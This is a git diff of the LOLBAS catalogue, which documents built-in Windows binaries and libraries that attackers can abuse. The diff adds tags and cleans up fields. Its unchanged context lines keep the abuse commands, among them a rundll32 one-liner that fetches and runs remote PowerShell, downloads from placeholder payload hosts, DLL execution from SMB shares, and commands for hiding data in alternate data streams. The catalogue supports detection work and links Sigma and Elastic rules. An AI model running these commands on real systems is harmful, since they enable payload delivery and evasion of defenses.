https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml Resources: diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index f420282..8a1b221 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -12,12 +12,14 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: Presentationhost.exe https://example.com/payload - Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Description: It will download a remote payload and place it in INetCache. Usecase: Downloads payload from remote server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: C:\Windows\System32\Presentationhost.exe - Path: C:\Windows\SysWOW64\Presentationhost.exe diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index a007087..cd9f68d 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Type: Compression Full_Path: - Path: C:\Windows\System32\spool\tools\PrintBrm.exe Detection: diff --git a/yml/OSBinaries/Rasautou.yml b/yml/OSBinaries/Rasautou.yml index 459d579..5ddc561 100644 --- a/yml/OSBinaries/Rasautou.yml +++ b/yml/OSBinaries/Rasautou.yml @@ -11,10 +11,10 @@ Commands: Privileges: User, Administrator in Windows 8 MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\rasautou.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml - IOC: rasautou.exe command line containing -d and -p diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index e4cb171..2272b26 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -11,6 +11,9 @@ Commands: Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format - Command: regasm.exe /U AllTheThingsx64.dll Description: Loads the target .DLL file and executes the UnRegisterClass function. Usecase: Execute code and bypass Application whitelisting @@ -18,13 +21,14 @@ Commands: Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index e9c1992..e2f2b62 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\Register-cimprovider.exe - Path: C:\Windows\SysWOW64\Register-cimprovider.exe diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 45f7233..f159f04 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. Usecase: Execute dll file and bypass Application whitelisting @@ -18,11 +21,12 @@ Commands: Privileges: Local Admin MitreID: T1218.009 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL + - Input: Custom Format Full_Path: - Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe - Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml diff --git a/yml/OSBinaries/Rundll32.yml b/yml/OSBinaries/Rundll32.yml index d108266..ba5d622 100644 --- a/yml/OSBinaries/Rundll32.yml +++ b/yml/OSBinaries/Rundll32.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint Description: Use Rundll32.exe to execute a DLL from a SMB share. EntryPoint is the name of the entry point in the .DLL file to execute. Usecase: Execute DLL from SMB share. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');") Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. Usecase: Execute code from Internet @@ -53,18 +57,20 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: rundll32.exe -sta {CLSID} - Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID. + Description: Use Rundll32.exe to load a registered or hijacked COM Server payload. Also works with ProgID. Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code. Category: Execute Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10 (and likely previous versions), Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\rundll32.exe - Path: C:\Windows\SysWOW64\rundll32.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml diff --git a/yml/OSBinaries/Tar.yml b/yml/OSBinaries/Tar.yml index 6099bfa..5a35631 100644 --- a/yml/OSBinaries/Tar.yml +++ b/yml/OSBinaries/Tar.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows 10, Windows 11 + Tags: + - Type: Compression - Command: tar -xf compressedfilename:ads Description: Decompress a compressed file from an alternate data stream (ADS). Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows 10, Windows 11 + Tags: + - Type: Compression - Command: tar -xf \\host1\archive.tar Description: Extracts archive.tar from the remote (internal) host (host1) to the current host. Usecase: Copy files @@ -25,6 +29,8 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Type: Compression Full_Path: - Path: C:\Windows\System32\tar.exe - Path: C:\Windows\SysWOW64\tar.exe diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 05b47cf..e4b6fdb 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 + Tags: + - Execute: WSH - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 + Tags: + - Execute: WSH Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe @@ -28,6 +32,4 @@ Detection: - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml Acknowledgement: - Person: Lior Adar - Handle: - Person: Hai Vaknin(Lux) - Handle: diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index b56b878..d976bff 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -39,11 +39,11 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: WSH Full_Path: - Path: C:\Windows\System32\wbem\wmic.exe - Path: C:\Windows\SysWOW64\wbem\wmic.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index 3371fef..53b5ed3 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: WSH - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js Description: Download and execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures @@ -21,8 +23,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\wscript.exe - Path: C:\Windows\SysWOW64\wscript.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml diff --git a/yml/OSBinaries/Wuauclt.yml b/yml/OSBinaries/Wuauclt.yml index 2c57aac..d3fd724 100644 --- a/yml/OSBinaries/Wuauclt.yml +++ b/yml/OSBinaries/Wuauclt.yml @@ -5,16 +5,16 @@ Author: 'David Middlehurst' Created: 2020-09-23 Commands: - Command: wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer - Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach. + Description: Full_Path_To_DLL would be the absolute path to .DLL file and would execute code on attach. Usecase: Execute dll via attach/detach methods Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\System32\wuauclt.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index c7d36a7..549b609 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -19,12 +19,14 @@ Commands: MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM - Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index aca788a..b09f76a 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -18,6 +18,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Input: INF - Command: rundll32.exe advpack.dll,RegisterOCX test.dll Description: Launch a DLL payload by calling the RegisterOCX function. Usecase: Load a DLL payload. @@ -25,6 +27,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: rundll32.exe advpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 5fae88d..5b74564 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -25,6 +25,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: rundll32.exe ieadvpack.dll,RegisterOCX calc.exe Description: Launch an executable by calling the RegisterOCX function. Usecase: Run an executable payload. diff --git a/yml/OSLibraries/Scrobj.yml b/yml/OSLibraries/Scrobj.yml index 5a3ba5c..6b94a49 100644 --- a/yml/OSLibraries/Scrobj.yml +++ b/yml/OSLibraries/Scrobj.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: c:\windows\system32\scrobj.dll - Path: c:\windows\syswow64\scrobj.dll diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index ea6653c..e5b6ccc 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Input: INF - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. Usecase: Load an executable payload. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows + Tags: + - Input: INF Full_Path: - Path: c:\windows\system32\setupapi.dll - Path: c:\windows\syswow64\setupapi.dll diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 5cb3f90..97e10ab 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Execute: DLL - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe Description: Launch an executable by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. diff --git a/yml/OSLibraries/Shimgvw.yml b/yml/OSLibraries/Shimgvw.yml index acf102f..1f58d66 100644 --- a/yml/OSLibraries/Shimgvw.yml +++ b/yml/OSLibraries/Shimgvw.yml @@ -5,12 +5,14 @@ Author: Eral4m Created: 2021-01-06 Commands: - Command: rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe - Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'. + Description: Once executed, rundll32.exe will download the file at the URL in the command to INetCache. Can also be used with entrypoint 'ImageView_FullscreenA'. Usecase: Download file from remote location. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: c:\windows\system32\shimgvw.dll - Path: c:\windows\syswow64\shimgvw.dll diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 3911593..ac5cce2 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Input: INF - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. Usecase: Load an executable payload. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218.011 OperatingSystem: Windows 10, Windows 11 + Tags: + - Input: INF Full_Path: - Path: c:\windows\system32\syssetup.dll - Path: c:\windows\syswow64\syssetup.dll diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index 65cadf0..e107b5e 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -21,8 +21,6 @@ Commands: Full_Path: - Path: c:\windows\system32\zipfldr.dll - Path: c:\windows\syswow64\zipfldr.dll -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml Resources: diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 013b575..4298de4 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 Code_Sample: diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml index 8f17285..26109da 100644 --- a/yml/OSScripts/UtilityFunctions.yml +++ b/yml/OSScripts/UtilityFunctions.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1216 OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11 + Tags: + - Execute: DLL Full_Path: - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 Code_Sample: diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index 777d9f7..be527da 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: DLL - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code to bypass AppLocker. @@ -18,6 +20,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: DLL Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index e1c9550..54678db 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -28,8 +28,6 @@ Commands: Full_Path: - Path: C:\Program Files\Microsoft Office\root\client\appvlp.exe - Path: C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_appvlp.yml Resources: diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index 1512ea6..9f4e6e6 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: WSH - Command: bginfo.exe bginfo.bgi /popup /nolicprompt Description: Execute VBscript code that is referenced within the bginfo.bgi file. Usecase: Local execution of VBScript @@ -18,12 +20,16 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: WSH - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. Category: Execute Privileges: User MitreID: T1218 + Tags: + - Execute: WSH OperatingSystem: Windows - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript @@ -32,6 +38,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: WSH - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. @@ -39,6 +47,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: WSH - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. @@ -46,10 +56,10 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: WSH Full_Path: - Path: No fixed path -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_bginfo.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml index b3d7c4f..b2fb1f7 100644 --- a/yml/OtherMSBinaries/Coregen.yml +++ b/yml/OtherMSBinaries/Coregen.yml @@ -11,6 +11,8 @@ Commands: Privileges: User MitreID: T1055 OperatingSystem: Windows + Tags: + - Execute: DLL - Command: coregen.exe dummy_assembly_name Description: Loads the coreclr.dll in the corgen.exe directory (e.g. C:\Program Files\Microsoft Silverlight\5.1.50918.0). Usecase: Execute DLL code @@ -25,6 +27,8 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows + Tags: + - Execute: DLL Full_Path: - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe @@ -42,8 +46,5 @@ Resources: - Link: https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html Acknowledgement: - Person: Nicky Tyrer - Handle: - Person: Evan Pena - Handle: - Person: Casey Erikson - Handle: diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml index 025d0ee..b89523a 100644 --- a/yml/OtherMSBinaries/Excel.yml +++ b/yml/OtherMSBinaries/Excel.yml @@ -6,11 +6,13 @@ Created: 2019-07-19 Commands: - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll Description: Downloads payload from remote server - Usecase: It will download a remote payload and place it in the cache folder + Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows + Tags: + - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml index fb2ac30..a1af94e 100644 --- a/yml/OtherMSBinaries/MsoHtmEd.yml +++ b/yml/OtherMSBinaries/MsoHtmEd.yml @@ -6,11 +6,13 @@ Created: 2022-07-24 Commands: - Command: MsoHtmEd.exe https://example.com/payload Description: Downloads payload from remote server - Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe diff --git a/yml/OtherMSBinaries/Mspub.yml b/yml/OtherMSBinaries/Mspub.yml index b810233..e325d90 100644 --- a/yml/OtherMSBinaries/Mspub.yml +++ b/yml/OtherMSBinaries/Mspub.yml @@ -6,11 +6,13 @@ Created: 2022-08-02 Commands: - Command: mspub.exe https://example.com/payload Description: Downloads payload from remote server - Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 + Tags: + - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe diff --git a/yml/OtherMSBinaries/Powerpnt.yml b/yml/OtherMSBinaries/Powerpnt.yml index 2b7313d..b72699d 100644 --- a/yml/OtherMSBinaries/Powerpnt.yml +++ b/yml/OtherMSBinaries/Powerpnt.yml @@ -6,11 +6,13 @@ Created: 2019-07-19 Commands: - Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll" Description: Downloads payload from remote server - Usecase: It will download a remote payload and place it in the cache folder + Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows + Tags: + - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 85890cb..0b05151 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml @@ -12,14 +12,18 @@ Commands: Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher + Tags: + - Execute: DLL - Command: procdump.exe -md calc.dll foobar Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. Usecase: Performs execution of unsigned DLL. Category: Execute Privileges: User MitreID: T1202 - OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher. + OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher + Tags: + - Execute: DLL Full_Path: - Path: no default Detection: diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index 33e6de2..5c3bdb5 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml @@ -18,6 +18,9 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows + Tags: + - Execute: DLL + - Input: Custom 